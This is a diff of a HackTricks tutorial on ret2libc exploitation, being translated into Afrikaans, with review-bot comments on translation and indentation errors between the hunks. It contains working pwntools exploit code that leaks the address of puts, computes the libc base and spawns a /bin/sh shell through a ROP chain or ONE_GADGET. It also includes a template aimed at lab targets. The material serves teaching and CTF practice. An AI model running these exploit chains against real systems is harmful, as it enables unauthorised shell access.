cyclic_find(0x6161616b)
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (140).png>)
|
||||
|
||||
After finding the offset (in this case 40) change the OFFSET variable inside the template using that value.\
|
||||
Nadat die offset (in hierdie geval 40) gevind is, verander die OFFSET-veranderlike binne die sjabloon met daardie waarde.\
|
||||
`OFFSET = "A" * 40`
|
||||
|
||||
Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pattern seach $rsp` from GEF.
|
||||
'n Ander manier sou wees om `pattern create 1000` te gebruik -- _uitvoer tot ret_ -- `pattern search $rsp` vanaf GEF.
|
||||
|
||||
# 2- Finding Gadgets
|
||||
|
||||
Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**.
|
||||
# 2- Vind Gadgets
|
||||
|
||||
Nou moet ons ROP-gadgets binne die binêre lêer vind. Hierdie ROP-gadgets sal nuttig wees om `puts` te roep om die **libc** wat gebruik word, te vind, en later om die **finale aanval** te lanceer.
|
||||
```python
|
||||
PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
|
||||
MAIN_PLT = elf.symbols['main']
|
||||
|
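Review bot: the block under `if OFFSET == "":` (from `gdb.attach(p.pid, "c")` to `return`) and the body of `main()` in `vuln.c` are both removed and re-added with only their indentation changed; for the Python template a dedented body detaches it from the `if`, so the offset-finding code would run even when `OFFSET` is already set. Leave every code block exactly as it was. In the prose, `Quick Resume` means a quick summary and should be `Vinnige Opsomming`, not `Vinnige Resensie` (a review), and the heading `# ROP - Leaking LIBC sjabloon` is only half translated. The translator did correctly fix `pattern seach` to `pattern search` and turned the mistaken "If any is provided" into "As daar geen verskuiwing verskaf word nie"; that matches the code, which runs the search when `OFFSET == ""`.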
@ -103,108 +94,98 @@ log.info("Main start: " + hex(MAIN_PLT))
|
|||
log.info("Puts plt: " + hex(PUTS_PLT))
|
||||
log.info("pop rdi; ret gadget: " + hex(POP_RDI))
|
||||
```
|
||||
Die `PUTS_PLT` word benodig om die **funksie puts** te roep.\
|
||||
Die `MAIN_PLT` word benodig om die **hooffunksie** weer te roep na een interaksie om die oorloop **weer** te **uitbuit** (oneindige rondes van uitbuiting). **Dit word aan die einde van elke ROP gebruik om die program weer te roep**.\
|
||||
Die **POP\_RDI** word benodig om 'n **parameter** aan die geroepte funksie oor te dra.
|
||||
|
||||
The `PUTS_PLT` is needed to call the **function puts**.\
|
||||
The `MAIN_PLT` is needed to call the **main function** again after one interaction to **exploit** the overflow **again** (infinite rounds of exploitation). **It is used at the end of each ROP to call the program again**.\
|
||||
The **POP\_RDI** is needed to **pass** a **parameter** to the called function.
|
||||
In hierdie stap hoef jy niks uit te voer nie, aangesien pwntools alles sal vind tydens die uitvoering.
|
||||
|
||||
In this step you don't need to execute anything as everything will be found by pwntools during the execution.
|
||||
|
||||
# 3- Finding LIBC library
|
||||
|
||||
Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address.
|
||||
# 3- Vind LIBC-biblioteek
|
||||
|
||||
Nou is dit tyd om uit te vind watter weergawe van die **libc**-biblioteek gebruik word. Om dit te doen, gaan ons die **adres** in die geheue van die **funksie puts** **lek** en dan gaan ons soek in watter **biblioteekweergawe** die puts-weergawe in daardie adres is.
|
||||
```python
|
||||
def get_addr(func_name):
|
||||
FUNC_GOT = elf.got[func_name]
|
||||
log.info(func_name + " GOT @ " + hex(FUNC_GOT))
|
||||
# Create rop chain
|
||||
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
|
||||
FUNC_GOT = elf.got[func_name]
|
||||
log.info(func_name + " GOT @ " + hex(FUNC_GOT))
|
||||
# Create rop chain
|
||||
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
|
||||
|
||||
#Send our rop-chain payload
|
||||
#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
|
||||
print(p.clean()) # clean socket buffer (read all and print)
|
||||
p.sendline(rop1)
|
||||
#Send our rop-chain payload
|
||||
#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
|
||||
print(p.clean()) # clean socket buffer (read all and print)
|
||||
p.sendline(rop1)
|
||||
|
||||
#Parse leaked address
|
||||
recieved = p.recvline().strip()
|
||||
leak = u64(recieved.ljust(8, "\x00"))
|
||||
log.info("Leaked libc address, "+func_name+": "+ hex(leak))
|
||||
#If not libc yet, stop here
|
||||
if libc != "":
|
||||
libc.address = leak - libc.symbols[func_name] #Save libc base
|
||||
log.info("libc base @ %s" % hex(libc.address))
|
||||
|
||||
return hex(leak)
|
||||
#Parse leaked address
|
||||
recieved = p.recvline().strip()
|
||||
leak = u64(recieved.ljust(8, "\x00"))
|
||||
log.info("Leaked libc address, "+func_name+": "+ hex(leak))
|
||||
#If not libc yet, stop here
|
||||
if libc != "":
|
||||
libc.address = leak - libc.symbols[func_name] #Save libc base
|
||||
log.info("libc base @ %s" % hex(libc.address))
|
||||
|
||||
return hex(leak)
|
||||
|
||||
get_addr("puts") #Search for puts address in memmory to obtains libc base
|
||||
if libc == "":
|
||||
print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
|
||||
p.interactive()
|
||||
print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
|
||||
p.interactive()
|
||||
```
|
||||
|
||||
To do so, the most important line of the executed code is:
|
||||
|
||||
Om dit te doen, is die belangrikste lyn van die uitgevoerde kode:
|
||||
```python
|
||||
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
|
||||
```
|
||||
Dit sal 'n paar byte stuur totdat die **RIP** oorskryf kan word: `OFFSET`.\
|
||||
Dan sal dit die **adres** van die gadget `POP_RDI` stel sodat die volgende adres (`FUNC_GOT`) in die **RDI**-register gestoor sal word. Dit is omdat ons die `PUTS_GOT`-adres as die adres in die geheue van die puts-funksie wil **oproep** en dit deurgee.\
|
||||
Daarna sal `PUTS_PLT` geroep word (met `PUTS_GOT` binne die **RDI**) sodat puts die inhoud binne `PUTS_GOT` (**die adres van die puts-funksie in die geheue**) sal **lees** en dit sal **afdruk**.\
|
||||
Uiteindelik word die **hooffunksie weer geroep** sodat ons die oorloop weer kan uitbuit.
|
||||
|
||||
This will send some bytes util **overwriting** the **RIP** is possible: `OFFSET`.\
|
||||
Then, it will set the **address** of the gadget `POP_RDI` so the next address (`FUNC_GOT`) will be saved in the **RDI** registry. This is because we want to **call puts** **passing** it the **address** of the `PUTS_GOT`as the address in memory of puts function is saved in the address pointing by `PUTS_GOT`.\
|
||||
After that, `PUTS_PLT` will be called (with `PUTS_GOT` inside the **RDI**) so puts will **read the content** inside `PUTS_GOT` (**the address of puts function in memory**) and will **print it out**.\
|
||||
Finally, **main function is called again** so we can exploit the overflow again.
|
||||
|
||||
This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** (which is inside **libc** library). Now that we have that address we can **search which libc version is being used**.
|
||||
Op hierdie manier het ons die puts-funksie **bedrieg** om die **adres** in die **geheue** van die puts-funksie (wat binne die **libc**-biblioteek is) **af te druk**. Nou dat ons daardie adres het, kan ons **soek watter libc-weergawe gebruik word**.
|
||||
|
||||
![](<../../../.gitbook/assets/image (141).png>)
|
||||
|
||||
As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\
|
||||
But, in a remote exploit case I will explain here how can you find it:
|
||||
Aangesien ons 'n **plaaslike** binêre lêer uitbuit, is dit **nie nodig** om uit te vind watter weergawe van **libc** gebruik word nie (vind net die biblioteek in `/lib/x86_64-linux-gnu/libc.so.6`).\
|
||||
Maar in die geval van 'n afstandsbediening-uitbuiting sal ek hier verduidelik hoe jy dit kan vind:
|
||||
|
||||
## 3.1- Searching for libc version (1)
|
||||
## 3.1- Soek na libc-weergawe (1)
|
||||
|
||||
You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me)\
|
||||
It will also allow you to download the discovered version of **libc**
|
||||
Jy kan soek watter biblioteek gebruik word op die webwerf: [https://libc.blukat.me/](https://libc.blukat.me)\
|
||||
Dit sal jou ook in staat stel om die ontdekte weergawe van **libc** af te laai.
|
||||
|
||||
![](<../../../.gitbook/assets/image (142).png>)
|
||||
|
||||
## 3.2- Searching for libc version (2)
|
||||
## 3.2- Soek na libc-weergawe (2)
|
||||
|
||||
You can also do:
|
||||
Jy kan ook doen:
|
||||
|
||||
* `$ git clone https://github.com/niklasb/libc-database.git`
|
||||
* `$ cd libc-database`
|
||||
* `$ ./get`
|
||||
|
||||
This will take some time, be patient.\
|
||||
For this to work we need:
|
||||
Dit sal 'n rukkie neem, wees geduldig.\
|
||||
Hiervoor benodig ons:
|
||||
|
||||
* Libc symbol name: `puts`
|
||||
* Leaked libc adddress: `0x7ff629878690`
|
||||
|
||||
We can figure out which **libc** that is most likely used.
|
||||
* Libc-simbolnaam: `puts`
|
||||
* Uitgelek libc-adres: `0x7ff629878690`
|
||||
|
||||
Ons kan uitvind watter **libc** waarskynlik gebruik word.
|
||||
```
|
||||
./find puts 0x7ff629878690
|
||||
ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
|
||||
archive-glibc (id libc6_2.23-0ubuntu11_amd64)
|
||||
```
|
||||
|
||||
We get 2 matches (you should try the second one if the first one is not working). Download the first one:
|
||||
|
||||
Ons kry 2 ooreenkomste (jy moet die tweede een probeer as die eerste een nie werk nie). Laai die eerste een af:
|
||||
```
|
||||
./download libc6_2.23-0ubuntu10_amd64
|
||||
Getting libc6_2.23-0ubuntu10_amd64
|
||||
-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
|
||||
-> Downloading package
|
||||
-> Extracting package
|
||||
-> Package saved to libs/libc6_2.23-0ubuntu10_amd64
|
||||
-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
|
||||
-> Downloading package
|
||||
-> Extracting package
|
||||
-> Package saved to libs/libc6_2.23-0ubuntu10_amd64
|
||||
```
|
||||
Kopieer die libc vanaf `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` na ons werksgids.
|
||||
|
||||
Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory.
|
||||
|
||||
## 3.3- Other functions to leak
|
||||
|
||||
## 3.3- Ander funksies om te lek
|
||||
```python
|
||||
puts
|
||||
printf
|
||||
|
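Review bot: the Afrikaans rendering of the `POP_RDI`/`FUNC_GOT` step changes its meaning: "Dit is omdat ons die `PUTS_GOT`-adres as die adres in die geheue van die puts-funksie wil **oproep** en dit deurgee" reads as if the `PUTS_GOT` address itself is called, whereas the English line it replaces says we call puts and pass it `PUTS_GOT` because the address of puts in memory is stored at the location `PUTS_GOT` points to; rephrase so that puts is the callee and `PUTS_GOT` is its argument. Separately, the `get_addr` lines in this hunk (`recieved = p.recvline().strip()`, `if libc != "":`, `return hex(leak)`) are marked as changed although their visible text is identical, which means only leading whitespace changed; since Python blocks depend on that indentation, confirm in the translated file that the `if libc != "":` body and the `return` are still inside the function.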
@ -212,29 +193,25 @@ __libc_start_main
|
|||
read
|
||||
gets
|
||||
```
|
||||
# 4- Vind gebaseerde libc-adres en uitbuiting
|
||||
|
||||
# 4- Finding based libc address & exploiting
|
||||
Op hierdie punt moet ons die gebruikte libc-biblioteek ken. Aangesien ons 'n plaaslike binêre lêer uitbuit, sal ek net gebruik maak van: `/lib/x86_64-linux-gnu/libc.so.6`
|
||||
|
||||
At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6`
|
||||
So, aan die begin van `template.py` verander die **libc** veranderlike na: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Stel biblioteekpad in wanneer dit bekend is`
|
||||
|
||||
So, at the beginning of `template.py` change the **libc** variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it`
|
||||
|
||||
Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**.
|
||||
|
||||
Inside the `get_addr`function the **base address of libc** is going to be calculated:
|
||||
Deur die **pad** na die **libc-biblioteek** te gee, sal die res van die **uitbuiting outomaties bereken** word.
|
||||
|
||||
Binne die `get_addr`-funksie sal die **basisadres van libc** bereken word:
|
||||
```python
|
||||
if libc != "":
|
||||
libc.address = leak - libc.symbols[func_name] #Save libc base
|
||||
log.info("libc base @ %s" % hex(libc.address))
|
||||
libc.address = leak - libc.symbols[func_name] #Save libc base
|
||||
log.info("libc base @ %s" % hex(libc.address))
|
||||
```
|
||||
|
||||
{% hint style="info" %}
|
||||
Note that **final libc base address must end in 00**. If that's not your case you might have leaked an incorrect library.
|
||||
Let daarop dat die **finale libc basisadres moet eindig in 00**. As dit nie jou geval is nie, het jy dalk 'n verkeerde biblioteek uitgelek.
|
||||
{% endhint %}
|
||||
|
||||
Then, the address to the function `system` and the **address** to the string _"/bin/sh"_ are going to be **calculated** from the **base address** of **libc** and given the **libc library.**
|
||||
|
||||
Dan sal die adres van die funksie `system` en die **adres** van die string _"/bin/sh"_ bereken word vanaf die **basisadres** van **libc** en die **libc-biblioteek** wat gegee is.
|
||||
```python
|
||||
BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh
|
||||
SYSTEM = libc.sym["system"]
|
||||
|
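Review bot: the heading `# 4- Vind gebaseerde libc-adres en uitbuiting` translates "based" literally; the section is about the libc base address, so "libc-basisadres" (the term this same section uses a few lines later, "basisadres van libc") is the right word. As in the previous hunk, `libc.address = leak - libc.symbols[func_name] #Save libc base` and `log.info("libc base @ %s" % hex(libc.address))` appear as changed with identical visible text, so the only change is indentation; check that both lines are still indented under `if libc != "":`, otherwise they run unconditionally.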
@ -243,9 +220,7 @@ EXIT = libc.sym["exit"]
|
|||
log.info("bin/sh %s " % hex(BINSH))
|
||||
log.info("system %s " % hex(SYSTEM))
|
||||
```
|
||||
|
||||
Finally, the /bin/sh execution exploit is going to be prepared sent:
|
||||
|
||||
Uiteindelik gaan die /bin/sh uitvoeringsaanval voorberei en gestuur word:
|
||||
```python
|
||||
rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
|
||||
|
||||
|
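Review bot: "uitvoeringsaanval" in "Uiteindelik gaan die /bin/sh uitvoeringsaanval voorberei en gestuur word:" renders "exploit" as "attack", while the rest of the translation uses "uitbuiting" for the same word (for example "# 4- Vind gebaseerde libc-adres en uitbuiting"); keep one term for "exploit" across the page.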
@ -255,80 +230,68 @@ p.sendline(rop2)
|
|||
#### Interact with the shell #####
|
||||
p.interactive() #Interact with the conenction
|
||||
```
|
||||
Laten ons hierdie finale ROP verduidelik.\
|
||||
Die laaste ROP (`rop1`) eindig deur weer die hooffunksie te roep, dan kan ons weer die oorloop **uitbuit** (daarom is die `OFFSET` hier weer). Dan wil ons `POP_RDI` roep wat wys na die **adres** van _"/bin/sh"_ (`BINSH`) en die **sisteem**-funksie (`SYSTEM`) roep omdat die adres van _"/bin/sh"_ as 'n parameter oorgedra sal word.\
|
||||
Uiteindelik word die **adres van die exit-funksie** geroep sodat die proses **netjies afsluit** en geen waarskuwing gegenereer word.
|
||||
|
||||
Let's explain this final ROP.\
|
||||
The last ROP (`rop1`) ended calling again the main function, then we can **exploit again** the **overflow** (that's why the `OFFSET` is here again). Then, we want to call `POP_RDI` pointing to the **addres** of _"/bin/sh"_ (`BINSH`) and call **system** function (`SYSTEM`) because the address of _"/bin/sh"_ will be passed as a parameter.\
|
||||
Finally, the **address of exit function** is **called** so the process **exists nicely** and any alert is generated.
|
||||
|
||||
**This way the exploit will execute a **_**/bin/sh**_** shell.**
|
||||
**Op hierdie manier sal die uitbuit 'n **_**/bin/sh**_**-skulp uitvoer.**
|
||||
|
||||
![](<../../../.gitbook/assets/image (143).png>)
|
||||
|
||||
# 4(2)- Using ONE\_GADGET
|
||||
# 4(2)- Gebruik ONE\_GADGET
|
||||
|
||||
You could also use [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**. \
|
||||
However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided.
|
||||
Jy kan ook [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget) gebruik om 'n skulp te verkry in plaas van **sisteem** en **"/bin/sh"** te gebruik. **ONE\_GADGET** sal binne die libc-biblioteek 'n manier vind om 'n skulp te verkry deur net een **ROP-adres** te gebruik.\
|
||||
Gewoonlik is daar egter beperkings, die mees algemene en maklikste om te vermy is soos `[rsp+0x30] == NULL`. Aangesien jy die waardes binne die **RSP** beheer, hoef jy net nog 'n paar NULL-waardes te stuur sodat die beperking vermy word.
|
||||
|
||||
![](<../../../.gitbook/assets/image (615).png>)
|
||||
|
||||
```python
|
||||
ONE_GADGET = libc.address + 0x4526a
|
||||
rop2 = base + p64(ONE_GADGET) + "\x00"*100
|
||||
```
|
||||
# HACKERINGSLEËR
|
||||
|
||||
# EXPLOIT FILE
|
||||
|
||||
You can find a template to exploit this vulnerability here:
|
||||
Jy kan 'n sjabloon vind om hierdie kwesbaarheid uit te buit hier:
|
||||
|
||||
{% content-ref url="rop-leaking-libc-template.md" %}
|
||||
[rop-leaking-libc-template.md](rop-leaking-libc-template.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
# Common problems
|
||||
# Algemene probleme
|
||||
|
||||
## MAIN\_PLT = elf.symbols\['main'] not found
|
||||
|
||||
If the "main" symbol does not exist. Then you can just where is the main code:
|
||||
## MAIN\_PLT = elf.symbols\['main'] nie gevind nie
|
||||
|
||||
As die "main" simbool nie bestaan nie. Dan kan jy net kyk waar die hoofkode is:
|
||||
```python
|
||||
objdump -d vuln_binary | grep "\.text"
|
||||
Disassembly of section .text:
|
||||
0000000000401080 <.text>:
|
||||
```
|
||||
|
||||
and set the address manually:
|
||||
|
||||
en stel die adres handmatig in:
|
||||
```python
|
||||
MAIN_PLT = 0x401080
|
||||
```
|
||||
## Puts nie gevind nie
|
||||
|
||||
## Puts not found
|
||||
As die binêre lêer nie Puts gebruik nie, moet jy nagaan of dit gebruik maak van
|
||||
|
||||
If the binary is not using Puts you should check if it is using
|
||||
## `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie`
|
||||
|
||||
## `sh: 1: %s%s%s%s%s%s%s%s: not found`
|
||||
|
||||
If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
|
||||
|
||||
Try to **subtract 64 bytes to the address of "/bin/sh"**:
|
||||
As jy hierdie **fout** vind nadat jy **alle** die aanvalle geskep het: `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie`
|
||||
|
||||
Probeer om **64 byte van die adres van "/bin/sh" af te trek**:
|
||||
```python
|
||||
BINSH = next(libc.search("/bin/sh")) - 64
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
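Review bot: the shell error string in the heading `## `sh: 1: %s%s%s%s%s%s%s%s: nie gevind nie`` and again in the sentence that follows it is program output, not prose, and must stay `sh: 1: %s%s%s%s%s%s%s%s: not found`, since readers search for the exact message the shell prints. Two more points in this hunk: `# HACKERINGSLEËR` is not a translation of `# EXPLOIT FILE` (something like "UITBUITINGSLÊER" would be), and `system` is a libc function name, so "die **sisteem**-funksie (`SYSTEM`)" and "in plaas van **sisteem** en **"/bin/sh"** te gebruik" should keep `system` untranslated, consistent with `SYSTEM = libc.sym["system"]` earlier in the file. "Laten ons hierdie finale ROP verduidelik." also uses the Dutch "Laten" where Afrikaans has "Laat ons".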
@ -1,16 +1,14 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
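Review bot: "GitHub-opslagplekke" at the end of this footer is capitalised differently from the same item in the other files of this commit ("github-opslagplekke"); settle on one spelling for the shared footer so later regenerations stop flipping it.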
@ -35,25 +33,25 @@ LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
|
|||
ENV = {"LD_PRELOAD": LIBC} if LIBC else {}
|
||||
|
||||
if LOCAL:
|
||||
P = process(LOCAL_BIN, env=ENV) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
P = process(LOCAL_BIN, env=ENV) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
|
||||
elif REMOTETTCP:
|
||||
P = remote('10.10.10.10',1339) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
P = remote('10.10.10.10',1339) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
|
||||
elif REMOTESSH:
|
||||
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
|
||||
p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
|
||||
elf = ELF(LOCAL_BIN)# Extract data from binary
|
||||
rop = ROP(elf)# Find ROP gadgets
|
||||
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
|
||||
p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
|
||||
elf = ELF(LOCAL_BIN)# Extract data from binary
|
||||
rop = ROP(elf)# Find ROP gadgets
|
||||
|
||||
if GDB and not REMOTETTCP and not REMOTESSH:
|
||||
# attach gdb and continue
|
||||
# You can set breakpoints, for example "break *main"
|
||||
gdb.attach(P.pid, "b *main")
|
||||
# attach gdb and continue
|
||||
# You can set breakpoints, for example "break *main"
|
||||
gdb.attach(P.pid, "b *main")
|
||||
|
||||
|
||||
|
||||
|
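Review bot: the `elif REMOTESSH:` branch assigns `p = ssh_shell.process(REMOTE_BIN)`, `elf = ELF(LOCAL_BIN)` and `rop = ROP(elf)`, but everything later in the template uses `P`, `ELF_LOADED` and `ROP_LOADED` (`gdb.attach(P.pid, "b *main")`, `ELF_LOADED.plt['puts']`, `ROP_LOADED.find_gadget(['pop rdi', 'ret'])`), so the SSH path raises NameError; rename the three assignments to match. This is pre-existing, but the hunk rewrites exactly these lines, so it is the moment to fix it. Every changed line in this hunk is also textually identical to the one it replaces, meaning the change is whitespace only; verify that the bodies of `if LOCAL:`, `elif REMOTETTCP:` and `elif REMOTESSH:` are still indented in the Afrikaans file.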
@ -63,15 +61,15 @@ if GDB and not REMOTETTCP and not REMOTESSH:
|
|||
|
||||
OFFSET = b"" #b"A"*264
|
||||
if OFFSET == b"":
|
||||
gdb.attach(P.pid, "c") #Attach and continue
|
||||
payload = cyclic(264)
|
||||
payload += b"AAAAAAAA"
|
||||
print(P.clean())
|
||||
P.sendline(payload)
|
||||
#x/wx $rsp -- Search for bytes that crashed the application
|
||||
#print(cyclic_find(0x63616171)) # Find the offset of those bytes
|
||||
P.interactive()
|
||||
exit()
|
||||
gdb.attach(P.pid, "c") #Attach and continue
|
||||
payload = cyclic(264)
|
||||
payload += b"AAAAAAAA"
|
||||
print(P.clean())
|
||||
P.sendline(payload)
|
||||
#x/wx $rsp -- Search for bytes that crashed the application
|
||||
#print(cyclic_find(0x63616171)) # Find the offset of those bytes
|
||||
P.interactive()
|
||||
exit()
|
||||
|
||||
|
||||
|
||||
|
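Review bot: the offset-finding block under `if OFFSET == b"":` is marked as changed although none of its visible text differs (from `gdb.attach(P.pid, "c") #Attach and continue` through `exit()`), so the change is whitespace only; if the translation dropped the indentation, `P.interactive()` and `exit()` run unconditionally and the script never gets past this block. Confirm the indentation in the translated file, or exclude fenced code blocks from the translation step.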
@ -79,11 +77,11 @@ if OFFSET == b"":
|
|||
### Find Gadgets ###
|
||||
####################
|
||||
try:
|
||||
libc_func = "puts"
|
||||
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
|
||||
libc_func = "puts"
|
||||
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
|
||||
except:
|
||||
libc_func = "printf"
|
||||
PUTS_PLT = ELF_LOADED.plt['printf']
|
||||
libc_func = "printf"
|
||||
PUTS_PLT = ELF_LOADED.plt['printf']
|
||||
|
||||
MAIN_PLT = ELF_LOADED.symbols['main']
|
||||
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
|
||||
|
